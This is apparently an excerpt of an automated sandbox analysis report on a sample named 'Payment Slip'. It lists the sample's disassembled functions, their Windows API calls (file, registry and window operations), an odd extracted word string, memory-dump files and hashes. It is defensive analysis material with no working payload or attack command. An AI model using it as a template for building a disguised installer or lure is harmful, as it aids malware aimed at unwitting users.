ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,0040BE78,0040330A,00409230,00409230,004031FC,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,00004000,?,00000000,?), ref: 00405BEB

Strings

habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek, xrefs: 00405BDA

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID: FileRead
String ID: habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek
API String ID: 2738559852-2559241417
Opcode ID: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
Instruction ID: bc424be8b840dd139efea3d7e203f87911aff5df88b68b997cf3f66dc638529d
Opcode Fuzzy Hash: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
Instruction Fuzzy Hash: 25E0EC3261425AABDF50AEA59C04EEB7B6CFB05360F044432F915E7190D631F921ABA9

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: c61a7965c9618faeb417bc3a597272482dc455235e96daa415df5349b26d071e
Instruction ID: f7aa54b913f5ca68b4de92db4f2492a915771a0f44b2d9fd206d2c7cbab0d3a4
Opcode Fuzzy Hash: c61a7965c9618faeb417bc3a597272482dc455235e96daa415df5349b26d071e
Instruction Fuzzy Hash: B501F431724210ABE7295B789C05B6A3698E720314F10853FF911F72F1DA78DC138B4D

Function 004022D3 Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402C42: RegOpenKeyExW.ADVAPI32(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C6A

RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004022F2
RegCloseKey.ADVAPI32(00000000), ref: 004022FB

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID:
API String ID: 849931509-0
Opcode ID: 36ef5da6fbfc07e8a15b968ecea78d0f55385d49df1121e4a03b4c1c669af082
Instruction ID: 6cfe575b1e931931ae6cf9a5ddb5ae5b21c85a020fc8f89310b59cc06b76a7bd
Opcode Fuzzy Hash: 36ef5da6fbfc07e8a15b968ecea78d0f55385d49df1121e4a03b4c1c669af082
Instruction Fuzzy Hash: E4F0AF72A04210ABEB01AFA18A8EAAE73689B14314F60043BF501B71C0C9BC5D02862A

Function 00405265 Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00405275

Part of subcall function 00404179: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418B

OleUninitialize.OLE32(00000404,00000000), ref: 004052C1

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID: InitializeMessageSendUninitialize
String ID:
API String ID: 2896919175-0
Opcode ID: af2aeeadcd52dffc57fc188a5948419f293eac36f005212a773a20406220c2cd
Instruction ID: 554e103746b9e2db7aaf45f87dc76b5a043826cfff103a1ab0517efa01412f9c
Opcode Fuzzy Hash: af2aeeadcd52dffc57fc188a5948419f293eac36f005212a773a20406220c2cd
Instruction Fuzzy Hash: 8FF090B6645600EBF62157549D05B677364EFE0300F1948BEEE44B22A1D7794C428F6D

Function 00401DC7 Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DDD
EnableWindow.USER32(00000000,00000000), ref: 00401DE8

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: 5d4edafec38fd2beb48ef5d0e9a47d4925bced023b06079ab6e9292498eaacb4
Instruction ID: 0a70c1ef7b0b049098d210b4544fd1cb3982b30fa54b0c42b808752cdcd1ba25
Opcode Fuzzy Hash: 5d4edafec38fd2beb48ef5d0e9a47d4925bced023b06079ab6e9292498eaacb4
Instruction Fuzzy Hash: 15E08CB2B04100DBD710AFA5AA8899D3378AB90369B60087BF502F10D1C6B86C008A7E

Function 00405B54 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,00402DFD,00437800,80000000,00000003), ref: 00405B58
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7A

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
Instruction ID: 50e17d5b3030c5d5ce0b1439250f6e41608f831a0cbc2ce1bc41554210f96241
Opcode Fuzzy Hash: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
Instruction Fuzzy Hash: 48D09E71658201EFFF098F20DE16F2EBBA2EB84B00F10562CB656940E0D6715815DB16

Function 00405B2F Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,00405734,?,?,00000000,0040590A,?,?,?,?), ref: 00405B34
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405B48

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 602326d4d9bd9ed3cd650c2996e001abd569afca198e3c7fdfe54113d0d0341f
Instruction ID: d8ea778f90f6dc502634cdc114c7d77142f0ebe51d0822ef38570996ea54cda0
Opcode Fuzzy Hash: 602326d4d9bd9ed3cd650c2996e001abd569afca198e3c7fdfe54113d0d0341f
Instruction Fuzzy Hash: 0AD01272D09020AFC6102728EE0C89BFF69EB54371B018B31FD75A22F0C7305C52CAA6

Function 0040159B Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 9c7ebf92a56fcc8e7e7cbcd5b1c4f40daf8b8ace81dd7006eb4a329e7acb9613
Instruction ID: 9dcfef7e452db0a7b9eae0ecc372c740654949990ed8f849d8faaf285a661dbe
Opcode Fuzzy Hash: 9c7ebf92a56fcc8e7e7cbcd5b1c4f40daf8b8ace81dd7006eb4a329e7acb9613
Instruction Fuzzy Hash: 8BD012B2708100D7DB10DFA59A0899D77749B15325F700977E101F21D0D2B895519A2A

Function 00404179 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418B

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 6744d7277f212479a905977dd6ad3f82a54aba672d76c2e2143d30a0699dc345
Instruction ID: 304cb8fb4d97a3357204857f1077e8b7844848a30fb901da7665e9cff7ac5a83
Opcode Fuzzy Hash: 6744d7277f212479a905977dd6ad3f82a54aba672d76c2e2143d30a0699dc345
Instruction Fuzzy Hash: A1C09B717443017BEE308B509D49F1777546794B40F144439B344F50D4C774E451D61D

Function 00404162 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,00403F8E), ref: 00404170

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 7da09c7c9c972ac789da334295fdd31a978bd1861dc1653affe8cad2486e61eb
Instruction ID: f15b28e5f211e7e8d1db6812d8cffd834990aabd0fd5fa3204c122ebb67abe5b
Opcode Fuzzy Hash: 7da09c7c9c972ac789da334295fdd31a978bd1861dc1653affe8cad2486e61eb
Instruction Fuzzy Hash: 2BB01235684202BBEE314B00ED0DF957E62F76C701F008474B340240F0CAB344B2DB09

Function 0040330D Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE5,?), ref: 0040331B

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
Instruction ID: 9708a756cc2c9ae94551e8e9c592081b607f980c3267f7876f2ac268d6c84cd7
Opcode Fuzzy Hash: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
Instruction Fuzzy Hash: B8B01231584200BFDA214F00DE05F057B21A790700F10C030B304381F082712420EB5D

Function 0040414F Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00403F27), ref: 00404159

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: d4a9609eba58a6edab031f960674205c4c57b6a31959d3d39446ece1986c9a37
Instruction ID: 866da2961ca677aab693f91c7c1a68d27da85f1a7500f820b7212f7e549623fc
Opcode Fuzzy Hash: d4a9609eba58a6edab031f960674205c4c57b6a31959d3d39446ece1986c9a37
Instruction Fuzzy Hash: 62A00276544101ABCB115B50EF48D057B62BBA47517518575B1455003486715461EF69

Non-executed Functions

Function 00404B0E Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404B26
GetDlgItem.USER32(?,00000408), ref: 00404B31
GlobalAlloc.KERNEL32(00000040,?), ref: 00404B7B
LoadBitmapW.USER32(0000006E), ref: 00404B8E
SetWindowLongW.USER32(?,000000FC,00405106), ref: 00404BA7
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BBB
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BCD
SendMessageW.USER32(?,00001109,00000002), ref: 00404BE3
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BEF
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C01
DeleteObject.GDI32(00000000), ref: 00404C04
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C2F
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C3B
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CD1
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CFC
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D10
GetWindowLongW.USER32(?,000000F0), ref: 00404D3F
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D4D
ShowWindow.USER32(?,00000005), ref: 00404D5E
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E5B
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EC0
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404ED5
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EF9
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F19
ImageList_Destroy.COMCTL32(?), ref: 00404F2E
GlobalFree.KERNEL32(?), ref: 00404F3E
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FB7
SendMessageW.USER32(?,00001102,?,?), ref: 00405060
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040506F
InvalidateRect.USER32(?,00000000,00000001), ref: 0040508F
ShowWindow.USER32(?,00000000), ref: 004050DD
GetDlgItem.USER32(?,000003FE), ref: 004050E8
ShowWindow.USER32(00000000), ref: 004050EF

Strings

, xrefs: 004050C7
M, xrefs: 00404CB8
N, xrefs: 00404D99

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 05935c29ea04aee5657b6778d98d1933a7035246dab6fdb79b38fb6bca2f1c75
Instruction ID: 29e4c212ffdeb16812bd97cb13f1a8c590c5d02c92ec483b1b79380362aa6ea4
